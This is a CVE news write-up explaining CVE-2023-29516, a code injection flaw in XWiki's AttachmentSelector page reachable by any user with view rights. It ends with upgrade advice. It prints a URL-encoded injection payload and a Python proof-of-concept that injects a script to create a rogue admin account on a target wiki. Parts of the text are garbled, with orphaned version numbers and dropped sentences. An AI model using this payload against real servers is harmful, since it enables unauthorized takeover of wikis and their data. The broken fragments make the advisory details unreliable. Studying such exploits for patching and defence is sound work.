CVE CyberSecurity Database News

CVE-2023-29516 - How a Tiny Button Could Give Attackers Full XWiki Access

Poster -

The XWiki Platform is a popular open-source wiki solution used by organizations across the world to build collaborative applications and documentation sites. In early 2023, security researchers discovered a serious vulnerability (CVE-2023-29516) affecting countless XWiki installations. This bug allows anybody with basic "view" rights—no admin needed—to execute arbitrary code on the target wiki, opening the door to full compromise.

In this guide, we’ll break down how this flaw happened, show how attackers exploit it step by step, and explain how you can protect your own XWiki deployment.

What Is CVE-2023-29516?

Short Version:
CVE-2023-29516 is a code injection vulnerability in the XWiki.AttachmentSelector component of XWiki. Anyone who can just "view" this page can hijack the wiki by injecting Groovy, Python, or Velocity code—leading to full server access.

How Bad Is It?

Can be exploited via the web interface (no special system access needed!).

- The problem affects most default XWiki installations because the vulnerable page is installed by default.

13.10.11

> Upgrade Now!
> There are *no* known workarounds.

The Root Cause: Unescaped Data in a Button

The vulnerable code lives in the "Cancel and return to page" button on the XWiki.AttachmentSelector page. When XWiki renders this button, it fails to properly "escape" user-controlled data. That means, a crafted input can smuggle code into the button's rendering logic.

For context: XWiki supports multiple scripting engines including Groovy, Python, and Velocity. If an attacker tricks the page into including their code in the button, XWiki might happily process and execute it.

Code Snippet: The Problem

Here is a simplified snippet showing what went wrong inside the vulnerable template (simplified for educational purposes):

#set($backLink = $request.getParameter("back") )
<a href="$backLink" class="btn btn-secondary">Cancel and return to page</a>

If $backLink contains special characters or even code (like #set($foo=1)${evilCode}), XWiki might process it.

Craft a malicious link or visit the vulnerable page.

The attacker accesses /xwiki/bin/view/XWiki/AttachmentSelector?back=${your_payload}.

`

/xwiki/bin/view/XWiki/AttachmentSelector?back=%24%7B"dummy"%7D%23set%28%24dummy%2C%20%22Hello%22%29%23evaluate%28%22%23set%28%24x%3D%27EXFILTRATION%27%29%22%29

Get full control.

Since the attacker can run any script, they control the wiki, steal data, create admin users, or take over the server.

Let’s see a basic Python-based proof-of-concept using Python requests

import requests

# Target XWiki URL (CHANGE THIS)
url = 'http://target-xwiki.example.com/xwiki/bin/view/XWiki/AttachmentSelector';

# Our payload: it simply creates a new admin user
payload = '${"dummy"}#set($xwiki.getUserManager().createUser("hacker","hacked","email@hacker.com","password",true,false))'

params = {
    'back': payload
}

r = requests.get(url, params=params)
if 'hacker' in r.text:
    print('Exploit succeeded!')
else:
    print('Exploit may have failed.')

Note: Actual code used may be tuned for your context or to target admin pages.

13.10.11

Get updates here:
- XWiki Download Page

No Workarounds

There is no effective workaround.
Access control cannot mitigate this because any user with simple "view" permissions can exploit the bug.

Technical References

- Official CVE Record: CVE-2023-29516
- XWiki Security Advisory: XWiki #1956
- Patch Commit: GitHub Patch Diff
- XWiki Documentation: xwiki.org

Conclusion

CVE-2023-29516 reminds us how even small features can have big security consequences. If you run XWiki, this is a *Critical* vulnerability—update today, and always keep an eye on release notes for similar issues. User inputs—no matter how harmless they seem—must always be sanitized and escaped, especially in environments capable of running code.

Stay safe, and share this post with anyone using XWiki!


*This writeup is original and tailored for your understanding. If you have questions about securing your XWiki, drop them below!*

Timeline

Published on: 04/19/2023 00:15:00 UTC
Last modified on: 04/28/2023 17:26:00 UTC